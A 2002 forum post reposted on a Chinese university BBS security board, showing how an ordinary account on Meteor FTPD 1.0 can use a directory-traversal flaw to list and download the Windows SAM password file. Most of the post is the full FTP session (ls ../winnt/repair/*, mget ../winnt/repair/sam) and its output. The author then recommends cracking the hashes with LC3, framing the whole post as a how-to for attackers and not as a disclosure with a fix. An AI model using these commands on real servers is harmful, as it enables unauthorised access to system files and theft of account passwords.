荔园在线
荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀
[回到开始]
[上一篇][下一篇]
发信人: ethanwy (朽木儿), 信区: Security
标 题: 【转】Meteor FTPD 1.0漏洞利用实例
发信站: 荔园晨风BBS站 (Wed Mar 6 09:28:07 2002), 转信
Meteor FTPD 1.0漏洞利用实例
作者:雾中鸟
Meteor FTPD 1.0是一款FTP服务器软件,存在一个漏洞就是能让在此FTP服务器上拥有帐
户的普通用户可以稍稍变形就可以浏览各个目录,因此就产生了很大的危险,下面我就
用一个例子来说明这一点:
ftp 192.168.0.1
Connected to 192.168.0.1
220 Service ready for new user
Utilisateur (192.168.160.1none)) : japleak
331 User name okay, need password
Mot de passe :
230- Meteor FTP Version 1.0
230 User logged in, proceed
ftp> ls ../winnt/repair/*
200 Command OK
150 About to open data connection
.
..
setup.log
secsetup.inf
system
software
default
security
sam
ntuser.dat
autoexec.nt
config.nt
226 Closing data connection. Requested file action successful.
ftp : 110 octets re=E7us dans 0,02Secondes 5,50Ko/sec.
ftp> mget ../winnt/repair/sam
200 Command OK
150 About to open data connection
226 Closing data connection. Requested file action successful.
ftp : 20480 octets re=E7us dans 0,01Secondes 2048,00Ko/sec.
ftp>quit
看见了吧?只要有一定经验的朋友都应该知道怎么做了,就是用lc3破解sam了。当然这
里还可以对上面的方法稍稍解释:
首先连接服务器192.168.0.1,由于你是这个服务器上的合法用户,用你的帐户和密码登
陆,然后用ls命令列出%system%\repair\目录下的所有文件,这里我们就需要的是sam文
件(储存nt帐户的密码文件)。然后用mget下载到本地,最后断开连接quit。
国外的一个很出名的黑客组织L0pht(http://www.l0pht.com/)推出的这个专门破解nt
/2000中sam文件的lc3,可以在短短几个小时破解出60%的密码,只要有足够时间,还怕
不能破解出来?
--
\_\/ .-==/~\
___/_,__,_ __ ____ ____ __)/ /{~}}
---,---,------------------,\'-' {{~}
'-==\}/
※ 来源:·荔园晨风BBS站 bbs.szu.edu.cn·[FROM: 192.168.33.42]
[回到开始]
[上一篇][下一篇]
荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店